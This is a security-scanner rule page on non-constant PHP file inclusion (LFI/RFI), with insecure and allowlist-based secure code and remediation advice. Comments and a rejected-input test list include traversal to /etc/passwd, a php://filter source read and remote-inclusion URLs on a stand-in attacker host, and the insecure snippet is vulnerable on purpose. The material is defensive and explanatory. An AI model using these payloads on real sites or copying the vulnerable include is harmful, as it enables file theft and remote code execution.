Non-constant file inclusion
Description
Detected a file inclusion statement (`include`, `include_once`, `require`, `require_once`) whose argument is not a constant. If user input reaches this statement it can lead to local file inclusion (LFI) or remote file inclusion (RFI). Because PHP executes the included file as code, the impact is not limited to disclosure of sensitive files: an attacker who controls the path can read any file the web server can read and, where a file with attacker-controlled content exists on the host or `allow_url_include` is enabled, execute arbitrary code.
Examples
Insecure Code
```php
// The request parameter is used directly as the path: ?file=../../../../etc/passwd
// discloses a local file, and with allow_url_include on, ?file=http://attacker.example/x
// fetches and executes remote code.
$file = $_GET['file'];
include $file;
```
Secure Code
```php
// Only names on the allowlist may be included; everything else is ignored.
$allowed_files = ['file1.php', 'file2.php'];
$file = $_GET['file'];
// Strict comparison (third argument) so only an exact string match passes;
// a non-string value such as ?file[]=x is rejected as well.
if (in_array($file, $allowed_files, true)) {
    include $file;
}
```
Remediation
Explicitly specify what to include, using a constant path. If the file to include genuinely depends on input, treat the input as a key into an allowlist that maps to fixed paths rather than as a filename or path, and reject anything not in the list. Do not rely on stripping `../` or blocking `http://`: PHP stream wrappers such as `php://` and `data://` and encoding tricks bypass such blocklist filters.
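The following is an added example of the allowlist approach, not code from the rule's documentation or from the phpcs-security-audit sniff it references. The `pages/` directory, the `page` request parameter and the page names are assumptions chosen for illustration. The request value is used only as a key into a map, so `../`, absolute paths, URLs and stream wrappers never reach `include`; a `realpath` check on the result guards against a file or symlink that was not expected to be there.

```php
<?php
declare(strict_types=1);

// Assumed layout: templates live under ./pages next to this script.
const PAGES_DIR = __DIR__ . '/pages';

// Keys are the only values a client may send; values are the only files
// that can ever be passed to include. (Names are assumptions for this example.)
const PAGE_MAP = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a request parameter to an includable absolute path.
 * Returns null for anything that is not an exact allowlisted key or whose
 * target does not resolve to a real file inside PAGES_DIR.
 */
function resolve_page(mixed $key): ?string
{
    // $_GET values may be arrays (?page[]=x); only plain strings can be keys.
    if (!is_string($key) || !array_key_exists($key, PAGE_MAP)) {
        return null;
    }

    // realpath() returns false if the path does not exist and resolves symlinks,
    // so the prefix check below compares canonical paths.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGE_MAP[$key]);

    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

// Constructed inputs showing what the resolver rejects; none of these
// strings is ever interpreted as a path because none is a map key.
$rejected = [
    '../../../../etc/passwd',
    'php://filter/convert.base64-encode/resource=index.php',
    'http://attacker.example/shell.txt',
    ['home'],          // array value from ?page[]=home
    'HOME',            // keys are case-sensitive; no normalisation is attempted
];
foreach ($rejected as $input) {
    assert(resolve_page($input) === null);
}

// Request handling: unknown keys get a 404 instead of an include.
$page = resolve_page($_GET['page'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page;
```

Note that `resolve_page('home')` also returns null until `pages/home.php` actually exists, because `realpath` fails on a missing file; that is deliberate, since a missing template should surface as a 404 rather than as a PHP warning from `include`.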
Rule Details
| Field | Value |
|---|---|
| ID | CODE-0750 |
| Category | Injection |
| Severity | CRITICAL |
| CWE | CWE-98 |
| Confidence | HIGH |
| Impact | HIGH |
| Likelihood | MEDIUM |
| Exploitability | EASY |
| Tags | LFI, RFI, file inclusion |
| OWASP | A1:2017-Injection, A03:2021-Injection |
References
- https://www.php.net/manual/en/function.include.php
- https://en.wikipedia.org/wiki/File_inclusion_vulnerability#Types_of_Inclusion
- https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/EasyRFISniff.php